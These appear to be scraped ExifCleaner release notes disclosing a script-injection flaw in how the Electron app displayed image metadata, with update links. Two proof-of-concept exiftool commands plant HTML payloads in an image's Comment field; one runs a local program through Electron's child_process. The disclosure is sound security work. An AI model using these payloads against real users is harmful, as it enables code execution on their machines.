Cross-platform desktop GUI app to clean image metadata
exiftool
HTML output in the UI. To take advantage of this, an attacker would have had to write image metadata containing malicious script code to a file that you then download and run through ExifCleaner. Proofs of concept:XSS:
exiftool -Comment='<img src=x onerror=alert("ok") /><b>OverJT</b>' -PixelUnits='meters' image.png
Electron reverse shell:
exiftool -Comment='<img src=x onerror=window.require("child_process").exec("/usr/bin/firefox") /><b>OverJT</b>' -PixelUnits='meters' image.png
If you are running a previous version of ExifCleaner, update immediately due to a security vulnerability found in exiftool (the command-line tool that ExifCleaner uses under the hood). Thank you to all contributors for this release. As always, credits are listed in the README.
exiftool
process keep-alive)https://github.com/szTheory/exifcleaner/compare/v3.2.0...v3.3.1
https://github.com/szTheory/exifcleaner/compare/v3.2.0...v3.3.0
https://github.com/szTheory/exifcleaner/compare/v3.1.0...v3.2.0
https://github.com/szTheory/exifcleaner/compare/v3.0.0...v3.1.0
https://github.com/szTheory/exifcleaner/compare/v2.1.0...v3.0.0
https://github.com/szTheory/exifcleaner/compare/v2.0.0...v2.1.0